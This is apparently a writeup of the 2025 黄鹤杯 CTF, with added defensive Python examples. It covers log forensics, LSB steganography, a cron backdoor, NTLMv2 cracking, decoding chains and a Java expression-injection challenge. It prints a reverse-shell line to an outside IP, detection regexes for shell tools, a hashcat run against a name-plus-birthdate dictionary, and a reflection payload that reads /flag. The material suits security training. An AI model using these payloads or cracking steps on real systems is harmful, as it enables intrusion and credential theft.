2025 黄鹤杯 Writeup



easylog

Search the log for "flag" to find the attacker's IP, then filter on that IP to obtain the flag.

flag{9780f373-8ac1-4a14-ac85-c490147a7285}


landscape

Problem:

Solution:

Extract the LSB data into a .bin file:

from PIL import Image

def extract_lsb(image_path, output_file):
    # Force RGB so every pixel unpacks as (r, g, b), even for palette or RGBA images
    img = Image.open(image_path).convert('RGB')
    width, height = img.size
    pixels = img.load()

    binary_data = ''

    for y in range(height):
        for x in range(width):
            r, g, b = pixels[x, y]

            # Take the least significant bit of each colour channel
            binary_data += str(r & 1)
            binary_data += str(g & 1)
            binary_data += str(b & 1)

    # Pack the bit string into bytes, dropping any incomplete trailing byte
    bytes_data = bytearray()
    for i in range(0, len(binary_data), 8):
        byte = binary_data[i:i+8]
        if len(byte) < 8:
            break
        bytes_data.append(int(byte, 2))

    # Save the extracted payload
    with open(output_file, 'wb') as f:
        f.write(bytes_data)

    print(f'LSB extraction finished, result saved to: {output_file}')

# Run the extraction
extract_lsb('landscape.bmp', 'lsb_extracted.bin')



└─# strings lsb_extracted.bin  | grep flag            
42:flag{1f078251-aaf6-6237-a0ce-f420d9e2c99a}            

cron


root@d8e7f18325b6:~# ps  -ef            
UID        PID  PPID  C STIME TTY          TIME CMD            
root         1     0  0 03:03 pts/0    00:00:00 /bin/bash /root/start.sh            
root        24     1  0 03:03 ?        00:00:00 /usr/sbin/sshd            
root        27     1  0 03:03 pts/0    00:00:00 tail -f /dev/null            
root        28    24  0 03:04 ?        00:00:00 sshd: [accepted]            
sshd        29    28  0 03:04 ?        00:00:00 sshd: [net]            
root        30    24  0 03:04 ?        00:00:00 sshd: root@pts/1            
root        41    24  0 03:05 ?        00:00:00 sshd: root@notty            
root        52    41  0 03:05 ?        00:00:00 /usr/lib/openssh/sftp-server            
root        53    30  0 03:05 pts/1    00:00:00 -bash            
root        61    53  0 03:05 pts/1    00:00:00 ps -ef            
root@d8e7f18325b6:~# crontab  -l            

* * * * * /usr/local/etc/cron_script.sh >> /var/log/cron.log 2>&1            
root@d8e7f18325b6:~# cat /var/log/cron.log            
cat: /var/log/cron.log: No such file or directory            
root@d8e7f18325b6:~# cat  /var/log/cron.log            
cat: /var/log/cron.log: No such file or directory            
root@d8e7f18325b6:~# cat  /var/log/cron.log^C            
root@d8e7f18325b6:~# cat /usr/local/etc/cron_script.sh            
#!/bin/bash            
bash -i >& /dev/tcp/192.168.1.103/8888 0>&1            
FLAG=flag{1j4h21u18tj0qm028bv3iv3kpjtj3u48}            
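Added example, not part of the original writeup: a small Python audit that parses the output of crontab -l, reads the script each entry runs, and reports the reverse-shell indicators visible in the session above. The crontab line and script body are constructed samples copied from that session, with the flag value replaced by a placeholder; the indicator list and the read_script callback are my own assumptions, not anything the challenge specifies.

```python
import re

# Constructed sample input, copied from the crontab entry and script body in the
# session above; the flag value is replaced by a placeholder.
SAMPLE_CRONTAB = "* * * * * /usr/local/etc/cron_script.sh >> /var/log/cron.log 2>&1\n"
SAMPLE_SCRIPT = (
    "#!/bin/bash\n"
    "bash -i >& /dev/tcp/192.168.1.103/8888 0>&1\n"
    "FLAG=flag{placeholder}\n"
)

# Indicator name -> regex. Each matches a construct commonly seen in cron-based persistence.
# This list is an assumption for the example; extend it from your own detection content.
INDICATORS = {
    "reverse shell via /dev/tcp": re.compile(r"/dev/(tcp|udp)/\S+"),
    "interactive shell spawned non-interactively": re.compile(r"\b(ba)?sh\s+-i\b"),
    "netcat with command execution": re.compile(r"\b(nc|ncat|netcat)\b.*\s-e\s"),
    "remote script piped to shell": re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"),
    "base64-decoded payload executed": re.compile(r"base64\s+(-d|--decode).*\|\s*(ba)?sh\b"),
}

CRON_SPECIALS = ("@reboot", "@yearly", "@annually", "@monthly", "@weekly", "@daily", "@hourly")


def parse_crontab(text):
    """Split crontab -l output into entries: schedule, full command, and the first executable."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        # Skip blanks, comments and environment assignments such as PATH=/usr/bin
        if not line or line.startswith("#") or re.match(r"^[A-Za-z_][A-Za-z0-9_]*=", line):
            continue
        if line.startswith(CRON_SPECIALS):
            fields = line.split(None, 1)
        else:
            fields = line.split(None, 5)
            if len(fields) < 6:
                continue  # malformed: fewer than five schedule fields plus a command
            fields = [" ".join(fields[:5]), fields[5]]
        if len(fields) < 2:
            continue
        schedule, command = fields
        entries.append({"schedule": schedule, "command": command, "script": command.split()[0]})
    return entries


def audit_script(text):
    """Return the names of every indicator that matches the given script body or command."""
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


def audit(crontab_text, read_script):
    """Cross-reference each cron entry with the script it runs.

    read_script(path) returns the file content or None; it is injected so the audit
    can run offline against files collected from a compromised host."""
    findings = []
    for entry in parse_crontab(crontab_text):
        hits = audit_script(entry["command"])  # the crontab line itself may carry the payload
        body = read_script(entry["script"])
        if body is not None:
            hits += [h for h in audit_script(body) if h not in hits]
        if hits:
            findings.append({
                "script": entry["script"],
                "schedule": entry["schedule"],
                "runs_every_minute": entry["schedule"] == "* * * * *",
                "indicators": hits,
            })
    return findings


if __name__ == "__main__":
    # Offline run against the constructed samples: the callback stands in for reading the file
    sample_fs = {"/usr/local/etc/cron_script.sh": SAMPLE_SCRIPT}
    for f in audit(SAMPLE_CRONTAB, sample_fs.get):
        print(f"{f['script']} ({f['schedule']}): {', '.join(f['indicators'])}")
```

On a live host, replace the callback with one that opens the path (and also walk /etc/cron.d, /etc/crontab and every user's crontab); a script that runs every minute and contains a /dev/tcp redirection is the signature of the persistence shown in this challenge.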



Incident Response Traffic Analysis

Problem:

During a red-team exercise, one of the group's intranet systems was compromised and important files were stolen. While tracing the intrusion, the responders found that an intranet operations engineer with weak security awareness had set a password of the form name + birth date (for example zhangsan19900421). The group's contact directory had been leaked, so the attacker used it to build a social-engineering dictionary, brute-forced the password, logged in, stole important files, and used a tunnelling technique for covert communication. The technicians downloaded the traffic from the security appliance; analyse it to recover the leaked SMB password and the hidden data inside the file exfiltrated over the tunnel. Flag format: flag{md5(leaked SMB password + hidden data in the exfiltrated file)}. Example: leaked SMB password admin123, hidden data secretABC, md5(admin123secretABC)=64b28055baab305b9f4ed6881ee4dc23, so the flag is flag{64b28055baab305b9f4ed6881ee4dc23}

SMB authentication success packet

Identify and extract the NTLMv2 response, then assemble it in this form:

username::domain:server_challenge:ntlmv2_response:proof_str

For the last field, right-click the item in Wireshark and copy its value.

administrator::.:853d0c9596a21a7f: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

Build a dictionary of name + birth date passwords and brute-force the hash:

jiangyingzhen19800407

caoyiying19870307

dongminfeng19830630

jinai19931203

guoqianpiao19901014

xuanyuanmingqi19890311

shixiaya19950424

liaoqiying19921125

weixuejing19951231

panyaoying19860429

cenghe19850609

…….


└─# hashcat -m 5600   ./hash1.txt ./1.txt  --show
ADMINISTRATOR::.:853d0c9596a21a7f:79dd4eb4c0218510e8f3a2e20cb159b8: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:xiexinhuan19850            

Recovered the name-based password xiexinhuan19850

Next, recover the hidden data from the file exfiltrated over the tunnel. Filter for image files transferred over SMB2:

smb2.filename contains ".jpg" or smb2.filename contains ".png"

dGgxc19sc19zM2NlcnQ

th1s_ls_s3cert

Final flag

xiexinhuan19850318th1s_ls_s3cert

flag{c1f9558d9d41e88501ecb2074eca186f}
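Added example, not from the original writeup: a Python check for exactly the weakness this challenge describes (pinyin name + birth date passwords), together with a padding-tolerant base64 decoder for strings like the one carved from the image above and a helper that builds the flag in the stated format. The directory entries and candidate passwords are constructed samples; the set of date renderings tried by birthdate_variants is my assumption, chosen to be broader than the single YYYYMMDD form the challenge shows.

```python
import base64
import hashlib

# Constructed directory entries, modelled on the pattern described in the challenge
SAMPLE_DIRECTORY = [
    {"name": "zhangsan", "birthdate": "19900421"},
    {"name": "xiexinhuan", "birthdate": "19850318"},
]


def birthdate_variants(birthdate):
    """Date renderings a weak password is likely to embed (assumed list):
    YYYYMMDD, YYMMDD, MMDD, YYYY, YYYY-MM-DD and YYYY.MM.DD."""
    y, m, d = birthdate[:4], birthdate[4:6], birthdate[6:8]
    return {y + m + d, y[2:] + m + d, m + d, y, f"{y}-{m}-{d}", f"{y}.{m}.{d}"}


def derived_from_directory(password, entry):
    """True when the password is just the person's pinyin name glued to a rendering of
    their birth date, in either order, ignoring case. This is the policy check the
    challenge's story says was missing."""
    pw = password.lower()
    name = entry["name"].lower()
    return any(pw in (name + date, date + name) for date in birthdate_variants(entry["birthdate"]))


def audit_passwords(passwords, directory):
    """Return every (password, name) pair that the leaked directory alone would let
    an attacker guess, so they can be forced to change before the directory leaks."""
    return [(pw, entry["name"]) for pw in passwords for entry in directory
            if derived_from_directory(pw, entry)]


def b64decode_lenient(text):
    """Decode base64 that may have lost its '=' padding, as the string carved from
    the exfiltrated image in this writeup has."""
    text = text.strip()
    text += "=" * (-len(text) % 4)
    return base64.b64decode(text).decode()


def build_flag(smb_password, hidden_data):
    """flag{md5(password + hidden data)} exactly as the challenge's flag format specifies."""
    digest = hashlib.md5((smb_password + hidden_data).encode()).hexdigest()
    return f"flag{{{digest}}}"


if __name__ == "__main__":
    # Constructed candidate list: two directory-derived passwords and one unrelated one
    candidates = ["zhangsan19900421", "Xiexinhuan850318", "correct-horse-battery"]
    for pw, name in audit_passwords(candidates, SAMPLE_DIRECTORY):
        print(f"weak: {pw!r} is derivable from directory entry {name!r}")
    print(b64decode_lenient("dGgxc19sc19zM2NlcnQ"))
    print(build_flag("admin123", "secretABC"))
```

A check like derived_from_directory belongs in the password-change path (or in a periodic audit against the HR directory), because the threat here is not hash strength but guessability from public facts; NTLMv2 cannot protect a password an attacker can enumerate from a contact list.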


组合拳 (Combo)

Problem

3031303130313030203031303130313130203031313130303030203031303131303030203031303130303130203030313130303030203031303031313130203031313030303031203031303031313031203031313131303130203031303031313130203031303031303030203031303130303130203031313031313030203031303130303130203031303030313031203031303130303031203031303130313031203030313130313030203031313131303130203031303130303031203031313031303131203031313030313030203031303130303131203031303130313031203031303130313130203031303130303130203031303031313130203031303130313030203031303030313031203031313131303030203031303030313031203031303130313030203031303130313130203031303130313130203031303131303130203031303130313130203031303030313031203031313130313030203031303031313031203031303130303131203031313031313030203031313030313030203031303031303030203031303130303131203031303130313030203031303130303130203031303030313031203031303130313030203031303130313031203031313131303030203031303031313031203031303130303031203031313031303131203031313030303131203030313130303031203031303130313031203031303130313130203031313030313030203031303030313130203031303130313030203031303030313031203031313130303030203031303130313031203031303130303130203030313130303031203031303130313031203031313131303130203031303130313130203030313130303030203031313031313030203031313030303031203031303130303031203031313031313030203031313030313030203031303031303030203031303130303130203031313031313030203031303031313130203031303031303030203031303130303031203030313130303030203030313131303031203031303031313031203031303130303130203031303130313031203030313130303031203031303130313131203031303031313130203031313031313030203031303030313031203030313131303031203031303130303030203031303130313030203030313130303030203030313131303031

Solution:

Hex to characters > binary to characters > base64 decode > base32 decode







AD

synt{ilqj3oB8416CXf1o3fLVUSxUz6}

Caesar cipher (shift 13, i.e. ROT13)

flag{vydw3bO8416PKs1b3sYIHFkHm6}
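Added example covering both the 组合拳 chain and the AD challenge; it is not code from the original writeup. decode_chain applies hex > binary text > base64 > base32 in the order the solution states, restoring the "=" padding that CTF strings often lose, and caesar_solve tries all 26 shifts and returns the one that yields "flag{". HEX_PREFIX is the first four groups of the challenge's hex blob; encode_chain and the round-trip input are constructed for the test only.

```python
import base64
import string

# Constructed inputs: the first four groups of the 组合拳 hex blob, and the AD ciphertext
HEX_PREFIX = "3031303130313030203031303130313130203031313130303030203031303131303030"
AD_CIPHERTEXT = "synt{ilqj3oB8416CXf1o3fLVUSxUz6}"


def hex_to_text(hex_str):
    """Layer 1: the challenge text is the hex encoding of ASCII characters."""
    return bytes.fromhex("".join(hex_str.split())).decode("ascii")


def binary_text_to_bytes(bin_str):
    """Layer 2: '01010100 01010110 ...' -> b'TV...'. Separators are optional; bits are read in
    8-bit groups and a trailing partial byte is dropped."""
    bits = "".join(bin_str.split())
    if set(bits) - {"0", "1"}:
        raise ValueError("not a binary string")
    return bytes(int(bits[i:i + 8], 2) for i in range(0, len(bits) - 7, 8))


def pad(text, block):
    """Restore '=' padding so base64 (block 4) and base32 (block 8) decoders accept the string."""
    return text + "=" * (-len(text) % block)


def decode_chain(hex_str):
    """hex -> binary text -> base64 -> base32, the exact order the writeup gives."""
    binary_text = hex_to_text(hex_str)
    b64_text = binary_text_to_bytes(binary_text).decode("ascii")
    b32_text = base64.b64decode(pad(b64_text, 4)).decode("ascii")
    return base64.b32decode(pad(b32_text, 8)).decode()


def encode_chain(plaintext):
    """Inverse of decode_chain; used only to build a constructed round-trip vector."""
    b32_text = base64.b32encode(plaintext.encode()).decode("ascii")
    b64_text = base64.b64encode(b32_text.encode()).decode("ascii")
    binary_text = " ".join(format(b, "08b") for b in b64_text.encode())
    return binary_text.encode("ascii").hex()


def caesar_shift(text, shift):
    """Shift letters by `shift` positions; digits, braces and punctuation are untouched."""
    out = []
    for ch in text:
        if ch in string.ascii_lowercase:
            out.append(string.ascii_lowercase[(ord(ch) - 97 + shift) % 26])
        elif ch in string.ascii_uppercase:
            out.append(string.ascii_uppercase[(ord(ch) - 65 + shift) % 26])
        else:
            out.append(ch)
    return "".join(out)


def caesar_solve(ciphertext, marker="flag{"):
    """Try all 26 shifts; return (shift, plaintext) for the first that contains the marker."""
    for shift in range(26):
        candidate = caesar_shift(ciphertext, shift)
        if marker in candidate:
            return shift, candidate
    return None


if __name__ == "__main__":
    print(hex_to_text(HEX_PREFIX))                 # the leading binary groups
    print(binary_text_to_bytes(hex_to_text(HEX_PREFIX)))  # start of the base64 layer
    print(decode_chain(encode_chain("flag{constructed}")))
    print(caesar_solve(AD_CIPHERTEXT))
```

To solve the full 组合拳 challenge, pass the entire hex string from the problem to decode_chain; the prefix shown here only demonstrates the first two layers, since three base32 characters are not a complete block.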

Expr

Payload

.class.forName('java.nio.file.Files').readAllLines(.class.forName('java.nio.file.Paths').get('/flag'))

Java expression injection vulnerability analysis

The /calc endpoint accepts an expression parameter

The expression is evaluated directly, without adequate filtering

Malicious Java reflection code is constructed to read a system file
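Added example, not from the original writeup, and written in Python rather than Java because the rest of this page's code is Python: the mitigation it shows applies equally to the /calc endpoint above. Rather than handing the request parameter to a general-purpose expression engine and then trying to filter it, the expression is parsed into an AST and only arithmetic nodes are interpreted, so attribute access, calls and names (the building blocks of the reflection payload) have no code path at all. PAYLOAD is the payload quoted above; BENIGN, the operator whitelist and MAX_LENGTH are my assumptions for the example.

```python
import ast
import operator

# Constructed sample inputs: a benign calculator expression and the reflection-style payload
# quoted in this writeup (it is not valid Python, so it is rejected at parse time)
BENIGN = "1 + 2 * (3 - 4) / 5"
PAYLOAD = ".class.forName('java.nio.file.Files').readAllLines(.class.forName('java.nio.file.Paths').get('/flag'))"

# Whitelist: only these operators may appear in a calculator expression (assumed set).
# Pow is deliberately absent: 9 ** 9 ** 9 is a denial of service, not a calculation.
BINARY_OPS = {
    ast.Add: operator.add,
    ast.Sub: operator.sub,
    ast.Mult: operator.mul,
    ast.Div: operator.truediv,
    ast.Mod: operator.mod,
}
UNARY_OPS = {ast.USub: operator.neg, ast.UAdd: operator.pos}
MAX_LENGTH = 256  # assumed request limit; bounds parser work before any evaluation


class UnsafeExpression(ValueError):
    """Raised for anything outside the arithmetic whitelist."""


def safe_eval(expr):
    """Evaluate an arithmetic expression without a general-purpose evaluator.

    The input is parsed to an AST and only numeric literals, + - * / %, unary signs and
    parentheses are interpreted. Everything else is refused by construction, so there is
    no blacklist for an attacker to bypass."""
    if len(expr) > MAX_LENGTH:
        raise UnsafeExpression("expression too long")
    try:
        tree = ast.parse(expr, mode="eval")
    except SyntaxError as exc:
        raise UnsafeExpression(f"not an arithmetic expression: {exc.msg}") from None
    return _eval_node(tree.body)


def _eval_node(node):
    if (isinstance(node, ast.Constant) and isinstance(node.value, (int, float))
            and not isinstance(node.value, bool)):
        return node.value
    if isinstance(node, ast.BinOp) and type(node.op) in BINARY_OPS:
        return BINARY_OPS[type(node.op)](_eval_node(node.left), _eval_node(node.right))
    if isinstance(node, ast.UnaryOp) and type(node.op) in UNARY_OPS:
        return UNARY_OPS[type(node.op)](_eval_node(node.operand))
    # Attribute, Call, Name, Subscript, Pow, strings, comparisons, ...: all refused
    raise UnsafeExpression(f"disallowed construct: {type(node).__name__}")


def is_safe(expr):
    """True when the expression is within the whitelist (it may still fail arithmetically)."""
    try:
        safe_eval(expr)
        return True
    except UnsafeExpression:
        return False


if __name__ == "__main__":
    for expr in (BENIGN, PAYLOAD, "(1).__class__", "2 ** 64"):
        try:
            print(f"{expr[:40]!r} -> {safe_eval(expr)}")
        except (UnsafeExpression, ZeroDivisionError) as err:
            print(f"{expr[:40]!r} -> rejected: {err}")
```

The same structure transfers to Java: a /calc endpoint that needs arithmetic should use a purpose-built arithmetic parser, and where a full expression language is unavoidable it must run in a restricted evaluation context with type references, reflection and method calls disabled, never in a default one with string filtering in front of it.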